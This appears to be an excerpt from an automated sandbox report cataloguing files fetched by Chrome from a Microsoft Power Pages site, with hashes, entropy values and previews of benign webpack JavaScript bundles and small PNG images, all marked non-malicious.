                                        SHA-256:A2EB7527F1135BFE4F7B429303B3350C680FEAA326EB307737EB2A90B7AA84B3
                                        SHA-512:7BCC3D8CE343FAC39E811990B3F0AAE3B1952DFF21A668FF21E2A5341673CE5A3D9E63E4B30D4F77FEBD80907BAD8E3251FE1F7DAAE33242D6349E370FB5989A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host||[]).push([[573],{4025:(t,e,n)=>{"use strict";n.d(e,{m:()=>u});var r=n(9686),i=n(64),s=n(8772),u=new(function(t){function e(){var e;return(e=t.call(this)||this).setup=function(t){var e;if(!s.S$&&(null==(e=window)?void 0:e.addEventListener)){var n=function(){return t()};return window.addEventListener("visibilitychange",n,!1),window.addEventListener("focus",n,!1),function(){window.removeEventListener("visibilitychange",n),window.removeEventListener("focus",n)}}},e}(0,r.A)(e,t);var n=e.prototype;return n.onSubscribe=function(){this.cleanup||this.setEventListener(this.setup)},n.onUnsubscribe=function(){var t;this.hasListeners()||(null==(t=this.cleanup)||t.call(this),this.cleanup=void 0)},n.setEventListener=function(t){var e,n=this;this.setup=t,null==(e=this.cleanup)||e.call(this),this.cleanup=t((function(t){"boolean"==typeof t?n.setFocused(t):n.onFocus()}))},n.setFocused=function(t){this.focused=t,t&&t
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 28 x 23, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):3.9708734032409505
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:35F83A3A0B018CB6CA6052CBAC9A95EB
                                        SHA1:0D847B30D38F26F5B0637442A1D391670DD6BB5F
                                        SHA-256:1F83F77AC22976CB6EDC2C0A4CB2F64D9B4938724F979B1B1CF9AEEF2454E7F9
                                        SHA-512:F8F31812722E20545E39D16820B71E7901C65C7943DD3EFC2F634132CEEA022347857FE552DF69E6303A99C1308A5693DFAB7CE684C041EEE7D46D6607AD51EB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b9dfae8a8964297/1724781827278/9KJUp9KwZ1y7PR3
                                        Preview:.PNG........IHDR.....................IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (28287)
                                        Category:downloaded
                                        Size (bytes):854454
                                        Entropy (8bit):5.353490881670294
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D31FE485CE19C172853AE34E3214830F
                                        SHA1:C167AEBA404F40C01E929D238E5E1370B782733A
                                        SHA-256:1BB9ECD31B0234FFD4217988447272C8F2760ACCD328482F9F39073081A82A6F
                                        SHA-512:91EB54A610D25B1A3D92299ECBF2D7C879C6BF09B2B207AA8F7A5C24C517DA51CC9DC111BE0EB8A10655496A9F0AF55220A0E35B127BF4612DDAF9B4AEB8454A
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf.bundle-d31fe485ce.js
                                        Preview:!function(n){var r={};function o(e){if(r[e])return r[e].exports;var t=r[e]={i:e,l:!1,exports:{}};return n[e].call(t.exports,t,t.exports,o),t.l=!0,t.exports}o.m=n,o.c=r,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(t,e){if(1&e&&(t=o(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var r in t)o.d(n,r,function(e){return t[e]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=18)}({18:function(e,t,n){n(19).polyfill()},19:function(e,t,n){"use strict";function r(e,t){if
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (8178)
                                        Category:dropped
                                        Size (bytes):8368
                                        Entropy (8bit):5.413062462771861
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2A7F06DAF5A262A4E720A4F601A21808
                                        SHA1:43BFD1C6C8C86B38A9ABE01AE8C569FBC398CFC7
                                        SHA-256:8E761B3A995FC87FE2E1D72A3FDEDDD4B51675457C0E7650A6689B08B7D8400F
                                        SHA-512:255D3B6AFAB953C95E797F4CE1F26C3A7949E3E90827E48E7C5CFF8BF8E944F3BF8E570590E21F7058E4EDA5C1704197EA83C7B95BE90CC09E443A969D350CBD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:(()=>{var e,r,t,o,n,a,i,f,l,u,c,s,d,p,h,v,m,g,b,y,w,j={7730:(e,r,t)=>{./*!. * Copyright (C) Microsoft Corporation. All rights reserved.. */.Promise.all([t.e(448),t.e(203),t.e(701),t.e(646),t.e(41),t.e(637)]).then(t.bind(t,7298))}},P={};function O(e){var r=P[e];if(void 0!==r)return r.exports;var t=P[e]={id:e,loaded:!1,exports:{}};return j[e].call(t.exports,t,t.exports,O),t.loaded=!0,t.exports}O.m=j,O.c=P,O.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return O.d(r,{a:r}),r},r=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,O.t=function(t,o){if(1&o&&(t=this(t)),8&o)return t;if("object"==typeof t&&t){if(4&o&&t.__esModule)return t;if(16&o&&"function"==typeof t.then)return t}var n=Object.create(null);O.r(n);var a={};e=e||[null,r({}),r([]),r(r)];for(var i=2&o&&t;"object"==typeof i&&!~e.indexOf(i);i=r(i))Object.getOwnPropertyNames(i).forEach((e=>a[e]=()=>t[e]));return a.default=()=>t,O.d(n,a),n},O.d=(e,r)=>{for(var t in r)O.o(r,t)&&!O.o(e,t)&&Object.defineProperty(e,t,{enum
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):625
                                        Entropy (8bit):7.484713757728487
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1CCFEA34F655127024E56A9182D069B2
                                        SHA1:F01C37FC36D6F283021BFE2021F884756ACC0830
                                        SHA-256:DDEB1C61FE3FC1C4195D6AF3CA1514F8EB78DE09E6DE3DBFCC960DDFDA93EE54
                                        SHA-512:E54442CFC5247B8D7137EB2389CB1E9B66EA2CDF4DBD062BB680D51FB50323CBECB908A6764CA29CEAEBB057C1FEBEE0FB0D7A1E367030531B63CE92B0F9A0C6
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/img/web.png
                                        Preview:.PNG........IHDR................a....pHYs.................sRGB.........gAMA......a.....IDATx..R.q.@..=...e:..Dt.+.t.+@. #.'..A.{,U.]Ap.8..T.. .3B.......3.......o.i..n..L.........}..x............Am.p..asd.$..WL.'...I.g.G.-M...c....Q.-..?......^.C..%8.^...(.lW....M..r.....x...'..O..9a..H..L..-.MSD.v.!.1t.{w..S..a..?..1.....q..l.Z.>..fO.t.?...8......9uK..pTU;....f..@..w....6......Dx.....i.._.z..h..b.y.f.S......1...+.0......1....e...,.6%.s...A.@.Qo.#.z.ht.,.K..........X...wn..4t....V.D9}p.}+H.S."..M_.<.H....{Z.Xj....0...g.....Uv.{ng+PWxl....'jkfKB..&..h. ....x...Z@.z.\jq....N........u.W.....IEND.B`.
                                        No static file info